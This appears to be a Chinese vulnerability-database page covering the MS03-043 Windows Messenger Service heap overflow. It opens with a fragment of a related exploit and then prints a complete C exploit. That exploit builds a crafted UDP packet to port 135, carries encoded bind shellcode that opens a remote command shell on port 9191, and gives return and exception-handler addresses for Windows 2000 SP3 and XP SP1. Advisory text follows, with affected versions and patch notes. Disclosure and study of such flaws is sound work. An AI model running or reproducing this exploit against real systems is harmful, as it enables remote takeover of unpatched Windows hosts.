        *(unsigned int *)(&packet[74]) = fields_size; 
  
        fprintf(stdout, "Total length of strings = %d\nPacket size = 
%d\nFields size = %d\n", strlen(from) + strlen(machine) + 
strlen(body),packet_size, fields_size); 
  


 if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) 
  { 
   perror("Error socket() - "); 
   exit(0); 
  } 
  
        if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, 
sizeof(addr)) == -1) 
  { 
   perror("Error sendto() - "); 
   exit(0); 
  } 
  


        exit(0); 
}

// milw0rm.com [2004-08-08]
		

- 漏洞信息 (23247)

Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability (EDBID:23247)
windows remote
2003-10-25 Verified
0 Adik
N/A [点击下载]
source: http://www.securityfocus.com/bid/8826/info

Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise. 

/************************************************************************************

 Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043)
 based on PoC DoS by recca@mail.ru

	by Adik < netmaniac [at] hotmail.kg >
	http://netninja.to.kg

 Binds command shell on port 9191
 Tested on 
			Windows XP Professional SP1 English version
			Windows 2000 Professional SP3 English version 

 access violation -> unhandledexceptionfilter -> 
 -> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode

 
  attach debugger and c how it flows :)	worked fine for me


	-[25/Oct/2003]-
************************************************************************************/

#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>

#pragma comment(lib,"ws2_32")

#define VER		"0.7"	

/**************** bind shellcode spawns shell on port 9191 ************************/

unsigned char kyrgyz_bind_code[] = {
	0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,0xC9,0x66,0xB9,
	0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA,
	0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 
	0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 
	0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 
	0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 
	0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 
	0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 
	0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 
	0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 
	0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 
	0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 
	0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 
	0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 
	0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 
	0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 
	0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 
	0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 
	0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 
	0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};



int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH);

int main(int argc,char *argv[])
{
        int sockUDP,ver,c, packetsz,cnt;
        unsigned char packet[8192];
        struct sockaddr_in targetUDP;        
		WSADATA wsaData;		
		
		struct
		{
			char os[30];
			DWORD SEH;
			DWORD JMP;
		} targetOS[] = 
		{
			{
				"Windows 2000 SP 3 (en)",
				0x77ee044c,		// unhandledexceptionfilter pointer
				0x768d693e		// cryptsvc.dll call [esi+48] 0x768d693e
			},
			{
				"Windows XP SP 1 (en)",
				0x77ed73b4,
				0x7804bf52	//rpcrt4.dll	call [edi+6c]
			}/*,
			{	//not tested
				"Windows XP SP 0 (en)",
				0x77ed63b4,
				0x7802ff3d	//rpcrt4 call [edi+6c]
			}*/
		};

		
		printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n"
				   " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);

		if(argc < 3)
		{			
			printf(" Target OS version:\n\n");
			for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++)
				printf(" [%d]\t%s\n",c,targetOS[c].os);
			printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n"
					" eg: msgr.exe 192.168.63.130 0\n",argv[0]);
			return 1;
		}
		ver = atoi(argv[2]);
		printf("[*] Target: \t IP: %s\t OS: %s\n"
			   "[*] UEF: \t 0x%x\n"
			   "[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP);

        WSAStartup(0x0202, &wsaData);
		printf("[*] WSAStartup initialized...\n");

        ZeroMemory(&targetUDP, sizeof(targetUDP));
		
        targetUDP.sin_family = AF_INET;
        targetUDP.sin_addr.s_addr = inet_addr(argv[1]);
        targetUDP.sin_port = htons(135);

		packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);

        if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
                return 1;
		}
		printf("[*] Socket initialized...\n");
		printf("[*] Injecting packet into a remote process...\n");
		
		if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
		{
			printf("[x] Failed to inject packet! Exiting...\n");
            return 1;
		}
		else
			printf("[*] Packet injected...\n");
		
		printf("[i] Try connecting to %s:9191\n\n",argv[1]);
        return 0;
}



/************************************************************************************/
int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH)
{	
		static unsigned char packet_header[] =
		"\x04\x00\x28\x00"
		"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
		"\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32"
		"\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
		"\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00";

		unsigned char field_header[] = 	"\xff\xff\xff\xff\x00\x00\x00\x00"
										"\xff\xff\xff\xff";

		int packet_size,i,fields_size;		
		char from[] = "NETMANIAC";
        char machine[] = "ADIK";
		char longjmp[] ="\x90\x90\x90\x90\x90"
						"\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF"
						"\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF"
						"\xFF\x2B\xC1\xFF\xE0";		
		char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90";
        char body[5000] = "*** MESSAGE ***";//4096

		ZeroMemory(packet, sizeofpacket);
		packet_size = 0;

        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
        packet_size += sizeof(packet_header) - 1;

        i = strlen(from) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], from);
        packet_size += (((i - 1) >> 2) + 1) << 2; 
        i = strlen(machine) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], machine);
        packet_size += (((i - 1) >> 2) + 1) << 2; 
		memset(body, 0x90, 2296); 
		memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
		memset(&body[2296],0x14,1800); 		
		memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp));
		*(DWORD *)&body[2296+1121] = Jmp;
		*(DWORD *)&body[2296+1125] = SEH;	
		memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1);
		fprintf(stdout, "[*] Msg body size: %d\n", 
						3656 - packet_size + sizeof(packet_header) - sizeof(field_header));
		
        body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';
		
        i = strlen(body) + 1;
		
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], body);
        packet_size += i;

        fields_size = packet_size - (sizeof(packet_header) - 1);
        *(unsigned int *)(&packet[40]) = time(NULL);
        *(unsigned int *)(&packet[74]) = fields_size;

		return packet_size;

}
/************************************************************************************/



		

- 漏洞信息

10936
Microsoft Windows Messenger Service Message Length Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in Microsoft Windows. The Messenger Service fails to perform proper bounds checking on the message length resulting in a buffer overflow. With a specially crafted message, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-10-15 2001-01-01
2003-11-16 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Messenger Service Buffer Overrun Vulnerability
Boundary Condition Error 8826
Yes No
2003-10-15 12:00:00 2009-07-11 11:56:00
Discovery is credited to The Last Stage of Delirium Research Group.

- 受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A proof of concept exploit (MS03-04.W2kFR.c), has been released by MrNice and has been reported to be tested on French Localized Microsoft Windows 2000 SP0 systems. A denial of service proof-of-concept has been released. A Linux port (ms03-043.c) of the denial of service proof-of-concept has also been released. The Linux port has been updated so that it compiles on FreeBSD.

- 解决方案

Microsoft has released updates to address this issue.

Microsoft has released updated version 1.1 of Microsoft security bulletin MS03-043 containing updated information for the security patch. Revision 2.0 of the bulletin was also released to provide updated patches for Windows 2000, Windows XP and Windows Server 2003 to address an unrelated problem with Debug Programs (SeDebugPrivilege). These patches can be found in the same location as the initial patches. Please see the updated bulletin for further details.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows 2000 Professional SP2

Microsoft Windows Server 2003 Web Edition

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows 2000 Server SP3

Microsoft Windows NT Terminal Server 4.0 SP6

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows XP 64-bit Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站